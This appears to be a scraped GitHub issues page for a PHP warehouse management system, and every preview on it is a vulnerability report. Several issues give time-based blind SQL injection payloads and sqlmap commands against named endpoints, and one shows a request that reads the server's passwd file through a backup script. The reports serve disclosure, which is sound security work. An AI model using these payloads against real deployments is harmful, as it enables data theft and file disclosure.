wms icon indicating copy to clipboard operation
wms copied to clipboard

企业仓库管理系统

Results 17 wms issues
Sort by recently updated
recently updated
newest added

![](https://cdn.nlark.com/yuque/0/2025/png/33722335/1738002567863-efef28ec-ea0e-4ef7-b1ee-6179ce9ce191.png) You can see that the content of the fread function is output here ![](https://cdn.nlark.com/yuque/0/2025/png/33722335/1738002982737-cde29616-b5e3-47a6-a327-f3d0ba795ebb.png) Successfully read passwd file ```php POST /wms/system/databak.php HTTP/1.1 Host: Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT...

![](https://cdn.nlark.com/yuque/0/2025/png/33722335/1737998178053-54ccf738-c1ef-45f7-8e8c-373e6eea33e1.png) The itemid parameter can be injected very clearly. ```php python sqlmap.py -u "http://127.0.0.1/wms/test/inquire_storage_item.php?itemid=1" -p "itemid" --batch --risk=3 --level=5 --dbms=mysql -dbs ``` ![](https://cdn.nlark.com/yuque/0/2025/png/33722335/1737998343435-28caf8c5-44cc-4213-815f-79b61ed6b9d8.png) ```php Parameter: itemid (GET) Type: boolean-based blind...

![Image](https://github.com/user-attachments/assets/fac0ee46-6dcf-479f-b139-37ba46ae3f6a) The id,date1,date2 parameters are injectable, and its principle and https://github.com/FeMiner/wms/issues/17 almost. payload: ``` /test/inquire_inout_receipt.php?option=date&date1=1' AND (SELECT 3264 FROM (SELECT(SLEEP(5)))THZh)-- SEXh /test/inquire_inout_receipt.php?option=date&date2=1' AND (SELECT 3264 FROM (SELECT(SLEEP(5)))THZh)-- SEXh /test/inquire_inout_receipt.php?option=warehouse&id=1' AND...

![](https://cdn.nlark.com/yuque/0/2025/png/33722335/1737997119068-13832fbf-b9f3-400d-935f-9eee0e1b692f.png) The id parameter is injectable, and its principle and [https://github.com/FeMiner/wms/issues/17](https://github.com/FeMiner/wms/issues/17) almost. ```php python sqlmap.py -u "http://127.0.0.1/wms/test/inquire_inout_item.php?option=type&id=1" -p "id" --batch --risk=3 --level=5 --dbms=mysql -dbs python sqlmap.py -u "http://127.0.0.1/wms/test/inquire_inout_item.php?option=receipt&id=1" -p "id"...

![Image](https://github.com/user-attachments/assets/a292e931-3280-46ac-9693-957651b02492) With https://github.com/FeMiner/wms/issues/17 The same vulnerability principle will not be described in detail. payload: /test/inquire_exchange_receipt.php?option=date&date1=1' AND (SELECT 3264 FROM (SELECT(SLEEP(5)))THZh)-- SEXh /test/inquire_exchange_receipt.php?option=date&date2=1' AND (SELECT 3264 FROM (SELECT(SLEEP(5)))THZh)-- SEXh /test/inquire_exchange_receipt.php?option=warehouse&id=1' AND...

How can there be so many SQL injections in one file. Lines 6-30 ![](https://cdn.nlark.com/yuque/0/2025/png/33722335/1737994484620-6c078d45-8ac6-4acc-843d-5e390cdde051.png) When the GET parameter option is' date ', two more GET parameters,' date1 'and' date2 ',...

![图片](https://github.com/user-attachments/assets/df568e8f-c0b5-4eb1-b6f5-e37bf9560dba) ![图片](https://github.com/user-attachments/assets/9ffba17e-17e1-4e86-8068-d95394915874) 修复建议 ![图片](https://github.com/user-attachments/assets/50a0d1cb-c1c9-4faa-bcc0-ccd63de62cda)